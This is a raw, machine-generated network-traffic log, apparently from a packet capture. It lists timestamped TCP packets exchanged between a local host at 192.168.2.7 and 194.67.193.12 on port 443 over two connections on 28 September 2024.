                Sep 28, 2024 03:22:10.382512093 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.382530928 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.383244038 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.383291960 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.383325100 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.383335114 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.383353949 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.383369923 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.386468887 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.386511087 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.386533022 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.386548042 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.386569023 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.386589050 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.387245893 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.387294054 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.387305021 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.387326002 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.387352943 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.387366056 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.395927906 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.395971060 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.396054029 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.396069050 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.396497965 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.396532059 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.396552086 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.396579027 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.396585941 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.396608114 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.396625042 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.397511005 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.397533894 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.397577047 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.397583961 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.397619009 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.397718906 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.398962021 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.398984909 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.399029016 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.399038076 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.399070024 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.399087906 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.410856962 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.410911083 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.410979986 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.410996914 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.411011934 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.411034107 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.411120892 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.411174059 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.411187887 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.411195993 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.411231995 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.435483932 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.435517073 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.435601950 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.435621977 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.435641050 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.435686111 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.504400015 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.504478931 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.504483938 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.504502058 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.504534960 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.504554987 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.504626036 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.504678965 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.504679918 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.504709005 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.504745960 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.504762888 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.505132914 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.505182028 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.505209923 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.505218029 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.505244017 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.505259991 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.505363941 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.505407095 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.505423069 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.505430937 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.505459070 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.505477905 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.505623102 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.505671978 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.505698919 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.505707979 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.505732059 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.505764961 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.506016016 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.506056070 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.506093025 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.506099939 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.506124020 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.506148100 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.506203890 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.506244898 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.506280899 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.506288052 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.506320000 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.506342888 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.517909050 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.517939091 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.517993927 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.518013000 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.518037081 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.518074036 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.518445969 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.518465042 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.518501043 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.518507004 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.518526077 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.518543005 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.519220114 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.519239902 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.519272089 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.519278049 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.519311905 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.519325018 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.522242069 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.522263050 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.522306919 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.522315025 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.522341013 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.522356033 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.522648096 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.522666931 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.522708893 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.522715092 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.522742987 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.523478031 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.523504019 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.523514986 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.523521900 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.523544073 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.523585081 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.524034023 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.524060011 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.524091959 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.524097919 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.524117947 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.524148941 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.524797916 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.524818897 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.524852037 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.524858952 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.524883032 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.524904013 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.533041954 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.533108950 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.533128977 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.533140898 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.533174038 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.533185959 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.596590042 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.596637964 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.596672058 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.596709013 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.596726894 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.596755028 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.596868038 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.596921921 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.596939087 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.596947908 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.596986055 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.596986055 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.626632929 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.626662970 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.626707077 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.626733065 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.626749992 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.626806974 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.626832962 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.626858950 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.626866102 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.626882076 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.626908064 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.627051115 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.627069950 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.627161980 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.627170086 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.627202988 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.627397060 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.627415895 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.627451897 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.627460957 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.627485991 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.627511978 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.627738953 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.627758026 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.627801895 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.627808094 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.627842903 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.627860069 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.628078938 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.628097057 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.628144026 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.628151894 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.628186941 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.639520884 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.639554024 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.639609098 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.639636993 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.639657021 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.639717102 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.639740944 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.639771938 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.639780998 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.639812946 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.639827013 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.639978886 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.639997959 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.640043020 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.640049934 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.640075922 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.640094042 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.640219927 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.640239000 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.640275002 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.640281916 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.640305996 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.640321016 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.640475988 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.640494108 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.640527010 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.640533924 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.640569925 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.640585899 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.640846968 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.640866041 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.640897989 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.640907049 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.640929937 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.640948057 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.641225100 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.641242981 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.641277075 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.641283035 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.641309023 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.641324997 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.641511917 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.641530037 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.641561031 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.641567945 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.641596079 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.641611099 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.688659906 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.688688040 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.688725948 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.688749075 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.688776970 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.688797951 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.689100981 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.689120054 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.689160109 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.689167976 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.689193964 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.689209938 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.698808908 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.698832989 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.698904037 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.698920965 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.698946953 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.698964119 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.718957901 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.718980074 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.719034910 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.719038010 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.719053030 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.719065905 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.719074965 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.719094038 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.719105005 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.719157934 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.719157934 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.719278097 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.719296932 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.719336987 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.719343901 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.719368935 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.719392061 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.719604969 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.719645977 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.719657898 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.719666958 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.719691992 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.719711065 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.719944000 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.719960928 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.719994068 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.720000982 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.720024109 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.720040083 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.720262051 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.720288992 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.720314026 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.720321894 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.720350981 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.720361948 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.730199099 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.730222940 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.730261087 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.730274916 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.730293036 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.730320930 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.730395079 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.730420113 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.730467081 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.730473995 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.730501890 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.730520964 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.730695009 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.730715036 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.730742931 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.730748892 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.730781078 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.730794907 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.762409925 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.762438059 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.762500048 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.762517929 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.762559891 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.762573004 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.762753963 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.762773037 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.762811899 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.762819052 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.762847900 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.762870073 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.763434887 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.763453960 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.763511896 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.763520002 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.763684988 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.763715029 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.763744116 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.763751984 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.763777971 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.763801098 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.781028032 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.781059980 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.781111002 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.781128883 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.781203985 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.781203985 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.781421900 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.781443119 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.781476974 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.781483889 CEST44349701194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.781508923 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.781526089 CEST49701443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.789376020 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.789406061 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.789480925 CEST49702443192.168.2.7194.67.193.12
                Sep 28, 2024 03:22:10.789498091 CEST44349702194.67.193.12192.168.2.7
                Sep 28, 2024 03:22:10.789527893 CEST49702443192.168.2.7194.67.193.12
